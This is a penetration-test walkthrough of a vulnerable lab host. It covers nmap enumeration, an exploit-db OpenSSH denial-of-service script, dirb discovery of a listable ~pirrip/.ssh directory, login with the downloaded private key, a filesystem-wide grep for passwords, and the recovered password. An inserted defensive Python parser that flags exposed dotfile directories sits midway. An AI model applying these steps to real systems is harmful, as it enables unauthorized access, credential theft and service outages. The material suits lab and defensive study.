Starting Nmap 6.01 ( http://nmap.org ) at 2012-11-12 04:49 EST
Nmap scan report for 192.168.2.100
Host is up (0.0011s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.4
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 2048 83:4f:8b:e9:ea:84:20:0d:3d:11:2b:f0:90:ca:79:1c (RSA1)
| 2048 6f:db:a5:12:68:cd:ad:a9:9c:cd:1e:7b:97:1a:4c:9f (DSA)
|_2048 ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10 (RSA)
25/tcp open smtp Sendmail 8.13.7/8.13.7
| smtp-commands: slax.example.net Hello [192.168.2.105], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP,
|_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP ". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Openwall popa3d
|_pop3-capabilities: capa
143/tcp open imap UW imapd 2004.357
|_imap-capabilities: LOGIN-REFERRALS THREAD=ORDEREDSUBJECT UNSELECT SCAN AUTH=LOGINA0001 MAILBOX-REFERRALS BINARY IMAP4REV1 completed THREAD=REFERENCES SASL-IR OK CAPABILITY SORT STARTTLS LITERAL+ IDLE NAMESPACE MULTIAPPEND
443/tcp closed https
MAC Address: 08:00:27:E7:A0:2B (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Host: slax.example.net; OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 1.13 ms 192.168.2.100
At address 192.168.2.100:80 I found some credential information about the developer and the marketer.
# Service Enumeration
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.4
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
25/tcp open smtp Sendmail 8.13.7/8.13.7
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357
# Vulnerability Assessment
1. Anonymous FTP login allowed
2. OpenSSH Denial of Service
3. Directory Listing
# Exploitation
First, I was interested in the FTP login, but I didn't get anything from the FTP.
Second, I tried the OpenSSH DoS vulnerability. Using this exploit, the SSH service went down temporarily. /pentest/exploits/exploitdb# platforms/multiple/dos/2444.sh
Third, I tried directory listing on the HTTP service. This part is separated into 3 steps:
1. Create a user list from the available info on their web site.
2. Create a file list of common user files on a Linux system.
3. Combine the user list and the file list with dirb (dirb is available in BackTrack).
---- Entering directory: http://192.168.2.101/~havisham/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://192.168.2.101/~havisham/.
(FOUND: 200 [Ok] - Size: 570)
+ http://192.168.2.101/~havisham/..
(FOUND: 200 [Ok] - Size: 579)
---- Entering directory: http://192.168.2.101/~magwitch/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://192.168.2.101/~magwitch/.
(FOUND: 200 [Ok] - Size: 570)
+ http://192.168.2.101/~magwitch/..
(FOUND: 200 [Ok] - Size: 579)
---- Entering directory: http://192.168.2.101/~pirrip/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://192.168.2.101/~pirrip/.
(FOUND: 200 [Ok] - Size: 566)
+ http://192.168.2.101/~pirrip/..
(FOUND: 200 [Ok] - Size: 579)
+ http://192.168.2.101/~pirrip/.ssh/
==> DIRECTORY
---- Entering directory: http://192.168.2.101/~pirrip/.ssh/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://192.168.2.101/~pirrip/.ssh/.
(FOUND: 200 [Ok] - Size: 816)
+ http://192.168.2.101/~pirrip/.ssh/..
(FOUND: 200 [Ok] - Size: 566)
-----------------
DOWNLOADED: 1740 - FOUND: 10
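As an added triage example (not part of the original write-up): a small Python parser over the dirb output format shown above that records which directories dirb reported as listable and flags any that expose sensitive dotfile paths such as `.ssh` under an Apache UserDir account, so the affected account's home directory permissions can be fixed. The sample input is a constructed excerpt of the output above, and the SENSITIVE list is my own choice.

```python
import re

# Constructed excerpt in the same format as the dirb output above.
DIRB_OUTPUT = """\
---- Entering directory: http://192.168.2.101/~havisham/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://192.168.2.101/~havisham/.
(FOUND: 200 [Ok] - Size: 570)
---- Entering directory: http://192.168.2.101/~pirrip/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
+ http://192.168.2.101/~pirrip/.ssh/
==> DIRECTORY
---- Entering directory: http://192.168.2.101/~pirrip/.ssh/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
+ http://192.168.2.101/~pirrip/.ssh/.
(FOUND: 200 [Ok] - Size: 816)
"""

ENTER_RE = re.compile(r"^---- Entering directory: (\S+) ----$")
LISTABLE_RE = re.compile(r"^\(!\) WARNING: Directory IS LISTABLE")
USERDIR_RE = re.compile(r"/~([^/]+)/")
# Dotfile paths that should never be reachable through a web server's UserDir
# (my own list; extend it for your environment).
SENSITIVE = (".ssh", ".bash_history", ".htpasswd", ".git")


def parse_dirb(text):
    """Return {directory_url: listable} for every directory dirb entered."""
    dirs = {}
    current = None
    for line in text.splitlines():
        m = ENTER_RE.match(line)
        if m:
            current = m.group(1)
            dirs[current] = False
        elif current and LISTABLE_RE.match(line):
            dirs[current] = True
    return dirs


def sensitive_exposures(dirs):
    """Listable directories whose URL path contains a sensitive component."""
    return sorted(url for url, listable in dirs.items()
                  if listable and any(seg in SENSITIVE for seg in url.split("/")))


def exposed_userdirs(dirs):
    """Map each UserDir account (~user) to the listable sensitive paths it exposes."""
    report = {}
    for url in sensitive_exposures(dirs):
        m = USERDIR_RE.search(url)
        report.setdefault(m.group(1) if m else "?", []).append(url)
    return report
```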
From the dirb output, you can see the ~pirrip/.ssh/ listing. Open it in your browser and download id_rsa and id_rsa.pub. These two files are the SSH key pair used for key authentication. Now connect to the target machine with ssh.
# ssh -i id_rsa pirrip@192.168.2.100
Well, we have connected to the target machine. But we don't know the password of pirrip.
Finally, I used grep to find strings containing "Password".
# grep -r "Password" /
After a long time, I got the password of pirrip -> 0l1v3rtw1st